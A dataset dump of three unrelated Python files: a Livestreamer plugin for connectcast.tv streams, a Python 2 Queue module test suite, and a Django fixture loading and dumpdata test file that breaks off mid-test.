code
stringlengths 1
199k
|
|---|
import re
import json
from livestreamer.plugin import Plugin
from livestreamer.plugin.api import http, validate
from livestreamer.stream import HDSStream
SWF_URL = "https://www.connectcast.tv/jwplayer/jwplayer.flash.swf"
_url_re = re.compile("http(s)?://(\w+\.)?connectcast.tv/")
_manifest_re = re.compile(".*data-playback=\"([^\"]*)\".*")
class ConnectCast(Plugin):
@classmethod
def can_handle_url(self, url):
return _url_re.match(url)
def _get_streams(self):
res = http.get(self.url)
match = _manifest_re.search(res.text)
manifest = match.group(1)
streams = {}
streams.update(
HDSStream.parse_manifest(self.session, manifest, pvswf=SWF_URL)
)
return streams
__plugin__ = ConnectCast
|
import Queue
import sys
import threading
import time
from test.test_support import verify, TestFailed, verbose
QUEUE_SIZE = 5
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
def _doBlockingTest(block_func, block_args, trigger_func, trigger_args):
t = _TriggerThread(trigger_func, trigger_args)
t.start()
result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not t.startedEvent.isSet():
raise TestFailed("blocking function '%r' appeared not to block" %
block_func)
t.join(10) # make sure the thread terminates
if t.isAlive():
raise TestFailed("trigger function '%r' appeared to not return" %
trigger_func)
return result
def _doExceptionalBlockingTest(block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
t = _TriggerThread(trigger_func, trigger_args)
t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
raise TestFailed("expected exception of kind %r" %
expected_exception_class)
finally:
t.join(10) # make sure the thread terminates
if t.isAlive():
raise TestFailed("trigger function '%r' appeared to not return" %
trigger_func)
if not t.startedEvent.isSet():
raise TestFailed("trigger thread ended but event never set")
class FailingQueueException(Exception):
pass
class FailingQueue(Queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
Queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException, "You Lose"
return Queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException, "You Lose"
return Queue.Queue._get(self)
def FailingQueueTest(q):
if not q.empty():
raise RuntimeError, "Call this function with an empty queue"
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
verify(q.full(), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
_doBlockingTest(q.put, ("full",), q.get, ())
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
_doExceptionalBlockingTest(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
verify(q.full(), "Queue should be full")
q.get()
verify(not q.full(), "Queue should not be full")
q.put("last")
verify(q.full(), "Queue should be full")
# Test a blocking put
_doBlockingTest( q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
verify(q.empty(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
verify(not q.empty(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
verify(not q.empty(), "Queue should not be empty")
q.get()
verify(q.empty(), "Queue should be empty")
q.fail_next_get = True
try:
_doExceptionalBlockingTest(q.get, (), q.put, ('empty',),
FailingQueueException)
raise TestFailed("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
verify(not q.empty(), "Queue should not be empty")
q.get()
verify(q.empty(), "Queue should be empty")
def SimpleQueueTest(q):
if not q.empty():
raise RuntimeError, "Call this function with an empty queue"
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(222)
verify(q.get() == 111 and q.get() == 222,
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
verify(not q.empty(), "Queue should not be empty")
verify(not q.full(), "Queue should not be full")
q.put("last")
verify(q.full(), "Queue should be full")
try:
q.put("full", block=0)
raise TestFailed("Didn't appear to block with a full queue")
except Queue.Full:
pass
try:
q.put("full", timeout=0.01)
raise TestFailed("Didn't appear to time-out with a full queue")
except Queue.Full:
pass
# Test a blocking put
_doBlockingTest(q.put, ("full",), q.get, ())
_doBlockingTest(q.put, ("full", True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
verify(q.empty(), "Queue should be empty")
try:
q.get(block=0)
raise TestFailed("Didn't appear to block with an empty queue")
except Queue.Empty:
pass
try:
q.get(timeout=0.01)
raise TestFailed("Didn't appear to time-out with an empty queue")
except Queue.Empty:
pass
# Test a blocking get
_doBlockingTest(q.get, (), q.put, ('empty',))
_doBlockingTest(q.get, (True, 10), q.put, ('empty',))
cum = 0
cumlock = threading.Lock()
def worker(q):
global cum
while True:
x = q.get()
if x is None:
q.task_done()
return
cumlock.acquire()
try:
cum += x
finally:
cumlock.release()
q.task_done()
def QueueJoinTest(q):
global cum
cum = 0
for i in (0,1):
threading.Thread(target=worker, args=(q,)).start()
for i in xrange(100):
q.put(i)
q.join()
verify(cum==sum(range(100)), "q.join() did not block until all tasks were done")
for i in (0,1):
q.put(None) # instruct the threads to close
q.join() # verify that you can join twice
def QueueTaskDoneTest(q):
try:
q.task_done()
except ValueError:
pass
else:
raise TestFailed("Did not detect task count going negative")
def test():
q = Queue.Queue()
QueueTaskDoneTest(q)
QueueJoinTest(q)
QueueJoinTest(q)
QueueTaskDoneTest(q)
q = Queue.Queue(QUEUE_SIZE)
# Do it a couple of times on the same queue
SimpleQueueTest(q)
SimpleQueueTest(q)
if verbose:
print "Simple Queue tests seemed to work"
q = FailingQueue(QUEUE_SIZE)
FailingQueueTest(q)
FailingQueueTest(q)
if verbose:
print "Failing Queue tests seemed to work"
test()
|
import os
import sys
import tempfile
import unittest
import warnings
from io import StringIO
from unittest import mock
from django.apps import apps
from django.contrib.sites.models import Site
from django.core import management
from django.core.files.temp import NamedTemporaryFile
from django.core.management import CommandError
from django.core.management.commands.dumpdata import ProxyModelWarning
from django.core.serializers.base import ProgressBar
from django.db import IntegrityError, connection
from django.test import TestCase, TransactionTestCase, skipUnlessDBFeature
from .models import (
Article, Category, PrimaryKeyUUIDModel, ProxySpy, Spy, Tag, Visa,
)
class TestCaseFixtureLoadingTests(TestCase):
fixtures = ['fixture1.json', 'fixture2.json']
def testClassFixtures(self):
"Test case has installed 3 fixture objects"
self.assertEqual(Article.objects.count(), 3)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Django conquers world!>',
'<Article: Copyright is fine the way it is>',
'<Article: Poker has no place on ESPN>',
])
class SubclassTestCaseFixtureLoadingTests(TestCaseFixtureLoadingTests):
"""
Make sure that subclasses can remove fixtures from parent class (#21089).
"""
fixtures = []
def testClassFixtures(self):
"There were no fixture objects installed"
self.assertEqual(Article.objects.count(), 0)
class DumpDataAssertMixin:
def _dumpdata_assert(self, args, output, format='json', filename=None,
natural_foreign_keys=False, natural_primary_keys=False,
use_base_manager=False, exclude_list=[], primary_keys=''):
new_io = StringIO()
if filename:
filename = os.path.join(tempfile.gettempdir(), filename)
management.call_command('dumpdata', *args, **{'format': format,
'stdout': new_io,
'stderr': new_io,
'output': filename,
'use_natural_foreign_keys': natural_foreign_keys,
'use_natural_primary_keys': natural_primary_keys,
'use_base_manager': use_base_manager,
'exclude': exclude_list,
'primary_keys': primary_keys})
if filename:
with open(filename, "r") as f:
command_output = f.read()
os.remove(filename)
else:
command_output = new_io.getvalue().strip()
if format == "json":
self.assertJSONEqual(command_output, output)
elif format == "xml":
self.assertXMLEqual(command_output, output)
else:
self.assertEqual(command_output, output)
class FixtureLoadingTests(DumpDataAssertMixin, TestCase):
def test_loading_and_dumping(self):
apps.clear_cache()
Site.objects.all().delete()
# Load fixture 1. Single JSON file, with two objects.
management.call_command('loaddata', 'fixture1.json', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Time to reform copyright>',
'<Article: Poker has no place on ESPN>',
])
# Dump the current contents of the database as a JSON fixture
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Try just dumping the contents of fixtures.Category
self._dumpdata_assert(
['fixtures.Category'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", '
'"title": "News Stories"}}]'
)
# ...and just fixtures.Article
self._dumpdata_assert(
['fixtures.Article'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": {"headline": '
'"Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# ...and both
self._dumpdata_assert(
['fixtures.Category', 'fixtures.Article'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", '
'"title": "News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has '
'no place on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", '
'"fields": {"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Specify a specific model twice
self._dumpdata_assert(
['fixtures.Article', 'fixtures.Article'],
(
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": {"headline": '
'"Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
)
# Specify a dump that specifies Article both explicitly and implicitly
self._dumpdata_assert(
['fixtures.Article', 'fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Specify a dump that specifies Article both explicitly and implicitly,
# but lists the app first (#22025).
self._dumpdata_assert(
['fixtures', 'fixtures.Article'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Same again, but specify in the reverse order
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no '
'place on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields":'
' {"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]'
)
# Specify one model from one application, and an entire other application.
self._dumpdata_assert(
['fixtures.Category', 'sites'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 1, "model": "sites.site", "fields": {"domain": "example.com", "name": '
'"example.com"}}]'
)
# Load fixture 2. JSON file imported by default. Overwrites some existing objects
management.call_command('loaddata', 'fixture2.json', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Django conquers world!>',
'<Article: Copyright is fine the way it is>',
'<Article: Poker has no place on ESPN>',
])
# Load fixture 3, XML format.
management.call_command('loaddata', 'fixture3.xml', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: XML identified as leading cause of cancer>',
'<Article: Django conquers world!>',
'<Article: Copyright is fine the way it is>',
'<Article: Poker on TV is great!>',
])
# Load fixture 6, JSON file with dynamic ContentType fields. Testing ManyToOne.
management.call_command('loaddata', 'fixture6.json', verbosity=0)
self.assertQuerysetEqual(Tag.objects.all(), [
'<Tag: <Article: Copyright is fine the way it is> tagged "copyright">',
'<Tag: <Article: Copyright is fine the way it is> tagged "law">',
], ordered=False)
# Load fixture 7, XML file with dynamic ContentType fields. Testing ManyToOne.
management.call_command('loaddata', 'fixture7.xml', verbosity=0)
self.assertQuerysetEqual(Tag.objects.all(), [
'<Tag: <Article: Copyright is fine the way it is> tagged "copyright">',
'<Tag: <Article: Copyright is fine the way it is> tagged "legal">',
'<Tag: <Article: Django conquers world!> tagged "django">',
'<Tag: <Article: Django conquers world!> tagged "world domination">',
], ordered=False)
# Load fixture 8, JSON file with dynamic Permission fields. Testing ManyToMany.
management.call_command('loaddata', 'fixture8.json', verbosity=0)
self.assertQuerysetEqual(Visa.objects.all(), [
'<Visa: Django Reinhardt Can add user, Can change user, Can delete user>',
'<Visa: Stephane Grappelli Can add user>',
'<Visa: Prince >'
], ordered=False)
# Load fixture 9, XML file with dynamic Permission fields. Testing ManyToMany.
management.call_command('loaddata', 'fixture9.xml', verbosity=0)
self.assertQuerysetEqual(Visa.objects.all(), [
'<Visa: Django Reinhardt Can add user, Can change user, Can delete user>',
'<Visa: Stephane Grappelli Can add user, Can delete user>',
'<Visa: Artist formerly known as "Prince" Can change user>'
], ordered=False)
# object list is unaffected
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: XML identified as leading cause of cancer>',
'<Article: Django conquers world!>',
'<Article: Copyright is fine the way it is>',
'<Article: Poker on TV is great!>',
])
# By default, you get raw keys on dumpdata
self._dumpdata_assert(
['fixtures.book'],
'[{"pk": 1, "model": "fixtures.book", "fields": {"name": "Music for all ages", "authors": [3, 1]}}]'
)
# But you can get natural keys if you ask for them and they are available
self._dumpdata_assert(
['fixtures.book'],
'[{"pk": 1, "model": "fixtures.book", "fields": {"name": "Music for all ages", "authors": [["Artist '
'formerly known as \\"Prince\\""], ["Django Reinhardt"]]}}]',
natural_foreign_keys=True
)
# You can also omit the primary keys for models that we can get later with natural keys.
self._dumpdata_assert(
['fixtures.person'],
'[{"fields": {"name": "Django Reinhardt"}, "model": "fixtures.person"}, {"fields": {"name": "Stephane '
'Grappelli"}, "model": "fixtures.person"}, {"fields": {"name": "Artist formerly known as '
'\\"Prince\\""}, "model": "fixtures.person"}]',
natural_primary_keys=True
)
# Dump the current contents of the database as a JSON fixture
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker on TV is '
'great!", "pub_date": "2006-06-16T11:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}, {"pk": 4, '
'"model": "fixtures.article", "fields": {"headline": "Django conquers world!", "pub_date": '
'"2006-06-16T15:00:00"}}, {"pk": 5, "model": "fixtures.article", "fields": {"headline": "XML '
'identified as leading cause of cancer", "pub_date": "2006-06-16T16:00:00"}}, {"pk": 1, "model": '
'"fixtures.tag", "fields": {"tagged_type": ["fixtures", "article"], "name": "copyright", "tagged_id": '
'3}}, {"pk": 2, "model": "fixtures.tag", "fields": {"tagged_type": ["fixtures", "article"], "name": '
'"legal", "tagged_id": 3}}, {"pk": 3, "model": "fixtures.tag", "fields": {"tagged_type": ["fixtures", '
'"article"], "name": "django", "tagged_id": 4}}, {"pk": 4, "model": "fixtures.tag", "fields": '
'{"tagged_type": ["fixtures", "article"], "name": "world domination", "tagged_id": 4}}, {"pk": 1, '
'"model": "fixtures.person", "fields": {"name": "Django Reinhardt"}}, {"pk": 2, "model": '
'"fixtures.person", "fields": {"name": "Stephane Grappelli"}}, {"pk": 3, "model": "fixtures.person", '
'"fields": {"name": "Artist formerly known as \\"Prince\\""}}, {"pk": 1, "model": "fixtures.visa", '
'"fields": {"person": ["Django Reinhardt"], "permissions": [["add_user", "auth", "user"], '
'["change_user", "auth", "user"], ["delete_user", "auth", "user"]]}}, {"pk": 2, "model": '
'"fixtures.visa", "fields": {"person": ["Stephane Grappelli"], "permissions": [["add_user", "auth", '
'"user"], ["delete_user", "auth", "user"]]}}, {"pk": 3, "model": "fixtures.visa", "fields": {"person":'
' ["Artist formerly known as \\"Prince\\""], "permissions": [["change_user", "auth", "user"]]}}, '
'{"pk": 1, "model": "fixtures.book", "fields": {"name": "Music for all ages", "authors": [["Artist '
'formerly known as \\"Prince\\""], ["Django Reinhardt"]]}}]',
natural_foreign_keys=True
)
# Dump the current contents of the database as an XML fixture
self._dumpdata_assert(
['fixtures'],
'<?xml version="1.0" encoding="utf-8"?><django-objects version="1.0"><object pk="1" '
'model="fixtures.category"><field type="CharField" name="title">News Stories</field><field '
'type="TextField" name="description">Latest news stories</field></object><object pk="2" '
'model="fixtures.article"><field type="CharField" name="headline">Poker on TV is great!</field><field '
'type="DateTimeField" name="pub_date">2006-06-16T11:00:00</field></object><object pk="3" '
'model="fixtures.article"><field type="CharField" name="headline">Copyright is fine the way it '
'is</field><field type="DateTimeField" name="pub_date">2006-06-16T14:00:00</field></object><object '
'pk="4" model="fixtures.article"><field type="CharField" name="headline">Django conquers world!'
'</field><field type="DateTimeField" name="pub_date">2006-06-16T15:00:00</field></object><object '
'pk="5" model="fixtures.article"><field type="CharField" name="headline">XML identified as leading '
'cause of cancer</field><field type="DateTimeField" name="pub_date">2006-06-16T16:00:00</field>'
'</object><object pk="1" model="fixtures.tag"><field type="CharField" name="name">copyright</field>'
'<field to="contenttypes.contenttype" name="tagged_type" rel="ManyToOneRel"><natural>fixtures'
'</natural><natural>article</natural></field><field type="PositiveIntegerField" name="tagged_id">3'
'</field></object><object pk="2" model="fixtures.tag"><field type="CharField" name="name">legal'
'</field><field to="contenttypes.contenttype" name="tagged_type" rel="ManyToOneRel"><natural>'
'fixtures</natural><natural>article</natural></field><field type="PositiveIntegerField" '
'name="tagged_id">3</field></object><object pk="3" model="fixtures.tag"><field type="CharField" '
'name="name">django</field><field to="contenttypes.contenttype" name="tagged_type" '
'rel="ManyToOneRel"><natural>fixtures</natural><natural>article</natural></field><field '
'type="PositiveIntegerField" name="tagged_id">4</field></object><object pk="4" model="fixtures.tag">'
'<field type="CharField" name="name">world domination</field><field to="contenttypes.contenttype" '
'name="tagged_type" rel="ManyToOneRel"><natural>fixtures</natural><natural>article</natural></field>'
'<field type="PositiveIntegerField" name="tagged_id">4</field></object><object pk="1" '
'model="fixtures.person"><field type="CharField" name="name">Django Reinhardt</field></object>'
'<object pk="2" model="fixtures.person"><field type="CharField" name="name">Stephane Grappelli'
'</field></object><object pk="3" model="fixtures.person"><field type="CharField" name="name">'
'Artist formerly known as "Prince"</field></object><object pk="1" model="fixtures.visa"><field '
'to="fixtures.person" name="person" rel="ManyToOneRel"><natural>Django Reinhardt</natural></field>'
'<field to="auth.permission" name="permissions" rel="ManyToManyRel"><object><natural>add_user'
'</natural><natural>auth</natural><natural>user</natural></object><object><natural>change_user'
'</natural><natural>auth</natural><natural>user</natural></object><object><natural>delete_user'
'</natural><natural>auth</natural><natural>user</natural></object></field></object><object pk="2" '
'model="fixtures.visa"><field to="fixtures.person" name="person" rel="ManyToOneRel"><natural>Stephane'
' Grappelli</natural></field><field to="auth.permission" name="permissions" rel="ManyToManyRel">'
'<object><natural>add_user</natural><natural>auth</natural><natural>user</natural></object><object>'
'<natural>delete_user</natural><natural>auth</natural><natural>user</natural></object></field>'
'</object><object pk="3" model="fixtures.visa"><field to="fixtures.person" name="person" '
'rel="ManyToOneRel"><natural>Artist formerly known as "Prince"</natural></field><field '
'to="auth.permission" name="permissions" rel="ManyToManyRel"><object><natural>change_user</natural>'
'<natural>auth</natural><natural>user</natural></object></field></object><object pk="1" '
'model="fixtures.book"><field type="CharField" name="name">Music for all ages</field><field '
'to="fixtures.person" name="authors" rel="ManyToManyRel"><object><natural>Artist formerly known as '
'"Prince"</natural></object><object><natural>Django Reinhardt</natural></object></field></object>'
'</django-objects>',
format='xml', natural_foreign_keys=True
)
def test_dumpdata_with_excludes(self):
# Load fixture1 which has a site, two articles, and a category
Site.objects.all().delete()
management.call_command('loaddata', 'fixture1.json', verbosity=0)
# Excluding fixtures app should only leave sites
self._dumpdata_assert(
['sites', 'fixtures'],
'[{"pk": 1, "model": "sites.site", "fields": {"domain": "example.com", "name": "example.com"}}]',
exclude_list=['fixtures'])
# Excluding fixtures.Article/Book should leave fixtures.Category
self._dumpdata_assert(
['sites', 'fixtures'],
'[{"pk": 1, "model": "sites.site", "fields": {"domain": "example.com", "name": "example.com"}}, '
'{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}]',
exclude_list=['fixtures.Article', 'fixtures.Book']
)
# Excluding fixtures and fixtures.Article/Book should be a no-op
self._dumpdata_assert(
['sites', 'fixtures'],
'[{"pk": 1, "model": "sites.site", "fields": {"domain": "example.com", "name": "example.com"}}, '
'{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}]',
exclude_list=['fixtures.Article', 'fixtures.Book']
)
# Excluding sites and fixtures.Article/Book should only leave fixtures.Category
self._dumpdata_assert(
['sites', 'fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}]',
exclude_list=['fixtures.Article', 'fixtures.Book', 'sites']
)
# Excluding a bogus app should throw an error
with self.assertRaisesMessage(management.CommandError, "No installed app with label 'foo_app'."):
self._dumpdata_assert(['fixtures', 'sites'], '', exclude_list=['foo_app'])
# Excluding a bogus model should throw an error
with self.assertRaisesMessage(management.CommandError, "Unknown model: fixtures.FooModel"):
self._dumpdata_assert(['fixtures', 'sites'], '', exclude_list=['fixtures.FooModel'])
@unittest.skipIf(sys.platform.startswith('win'), "Windows doesn't support '?' in filenames.")
def test_load_fixture_with_special_characters(self):
management.call_command('loaddata', 'fixture_with[special]chars', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), ['<Article: How To Deal With Special Characters>'])
def test_dumpdata_with_filtering_manager(self):
spy1 = Spy.objects.create(name='Paul')
spy2 = Spy.objects.create(name='Alex', cover_blown=True)
self.assertQuerysetEqual(Spy.objects.all(),
['<Spy: Paul>'])
# Use the default manager
self._dumpdata_assert(
['fixtures.Spy'],
'[{"pk": %d, "model": "fixtures.spy", "fields": {"cover_blown": false}}]' % spy1.pk
)
# Dump using Django's base manager. Should return all objects,
# even those normally filtered by the manager
self._dumpdata_assert(
['fixtures.Spy'],
'[{"pk": %d, "model": "fixtures.spy", "fields": {"cover_blown": true}}, {"pk": %d, "model": '
'"fixtures.spy", "fields": {"cover_blown": false}}]' % (spy2.pk, spy1.pk),
use_base_manager=True
)
def test_dumpdata_with_pks(self):
management.call_command('loaddata', 'fixture1.json', verbosity=0)
management.call_command('loaddata', 'fixture2.json', verbosity=0)
self._dumpdata_assert(
['fixtures.Article'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": {"headline": '
'"Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}]',
primary_keys='2,3'
)
self._dumpdata_assert(
['fixtures.Article'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}]',
primary_keys='2'
)
with self.assertRaisesMessage(management.CommandError, "You can only use --pks option with one model"):
self._dumpdata_assert(
['fixtures'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}]',
primary_keys='2,3'
)
with self.assertRaisesMessage(management.CommandError, "You can only use --pks option with one model"):
self._dumpdata_assert(
'',
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}]',
primary_keys='2,3'
)
with self.assertRaisesMessage(management.CommandError, "You can only use --pks option with one model"):
self._dumpdata_assert(
['fixtures.Article', 'fixtures.category'],
'[{"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place on ESPN", '
'"pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Copyright is fine the way it is", "pub_date": "2006-06-16T14:00:00"}}]',
primary_keys='2,3'
)
def test_dumpdata_with_uuid_pks(self):
m1 = PrimaryKeyUUIDModel.objects.create()
m2 = PrimaryKeyUUIDModel.objects.create()
output = StringIO()
management.call_command(
'dumpdata', 'fixtures.PrimaryKeyUUIDModel', '--pks', ', '.join([str(m1.id), str(m2.id)]),
stdout=output,
)
result = output.getvalue()
self.assertIn('"pk": "%s"' % m1.id, result)
self.assertIn('"pk": "%s"' % m2.id, result)
def test_dumpdata_with_file_output(self):
management.call_command('loaddata', 'fixture1.json', verbosity=0)
self._dumpdata_assert(
['fixtures'],
'[{"pk": 1, "model": "fixtures.category", "fields": {"description": "Latest news stories", "title": '
'"News Stories"}}, {"pk": 2, "model": "fixtures.article", "fields": {"headline": "Poker has no place '
'on ESPN", "pub_date": "2006-06-16T12:00:00"}}, {"pk": 3, "model": "fixtures.article", "fields": '
'{"headline": "Time to reform copyright", "pub_date": "2006-06-16T13:00:00"}}]',
filename='dumpdata.json'
)
def test_dumpdata_progressbar(self):
"""
Dumpdata shows a progress bar on the command line when --output is set,
stdout is a tty, and verbosity > 0.
"""
management.call_command('loaddata', 'fixture1.json', verbosity=0)
new_io = StringIO()
new_io.isatty = lambda: True
with NamedTemporaryFile() as file:
options = {
'format': 'json',
'stdout': new_io,
'stderr': new_io,
'output': file.name,
}
management.call_command('dumpdata', 'fixtures', **options)
self.assertTrue(new_io.getvalue().endswith('[' + '.' * ProgressBar.progress_width + ']\n'))
# Test no progress bar when verbosity = 0
options['verbosity'] = 0
new_io = StringIO()
new_io.isatty = lambda: True
options.update({'stdout': new_io, 'stderr': new_io})
management.call_command('dumpdata', 'fixtures', **options)
self.assertEqual(new_io.getvalue(), '')
def test_dumpdata_proxy_without_concrete(self):
"""
A warning is displayed if a proxy model is dumped without its concrete
parent.
"""
ProxySpy.objects.create(name='Paul')
with warnings.catch_warnings(record=True) as warning_list:
warnings.simplefilter('always')
self._dumpdata_assert(['fixtures.ProxySpy'], '[]')
warning = warning_list.pop()
self.assertEqual(warning.category, ProxyModelWarning)
self.assertEqual(
str(warning.message),
"fixtures.ProxySpy is a proxy model and won't be serialized."
)
def test_dumpdata_proxy_with_concrete(self):
"""
A warning isn't displayed if a proxy model is dumped with its concrete
parent.
"""
spy = ProxySpy.objects.create(name='Paul')
with warnings.catch_warnings(record=True) as warning_list:
warnings.simplefilter('always')
self._dumpdata_assert(
['fixtures.ProxySpy', 'fixtures.Spy'],
'[{"pk": %d, "model": "fixtures.spy", "fields": {"cover_blown": false}}]' % spy.pk
)
self.assertEqual(len(warning_list), 0)
def test_compress_format_loading(self):
# Load fixture 4 (compressed), using format specification
management.call_command('loaddata', 'fixture4.json', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Django pets kitten>',
])
def test_compressed_specified_loading(self):
# Load fixture 5 (compressed), using format *and* compression specification
management.call_command('loaddata', 'fixture5.json.zip', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: WoW subscribers now outnumber readers>',
])
def test_compressed_loading(self):
# Load fixture 5 (compressed), only compression specification
management.call_command('loaddata', 'fixture5.zip', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: WoW subscribers now outnumber readers>',
])
def test_ambiguous_compressed_fixture(self):
# The name "fixture5" is ambiguous, so loading it will raise an error
with self.assertRaises(management.CommandError) as cm:
management.call_command('loaddata', 'fixture5', verbosity=0)
self.assertIn("Multiple fixtures named 'fixture5'", cm.exception.args[0])
def test_db_loading(self):
# Load db fixtures 1 and 2. These will load using the 'default' database identifier implicitly
management.call_command('loaddata', 'db_fixture_1', verbosity=0)
management.call_command('loaddata', 'db_fixture_2', verbosity=0)
self.assertQuerysetEqual(Article.objects.all(), [
'<Article: Who needs more than one database?>',
'<Article: Who needs to use compressed data?>',
])
def test_loaddata_error_message(self):
"""
Loading a fixture which contains an invalid object outputs an error
message which contains the pk of the object that triggered the error.
"""
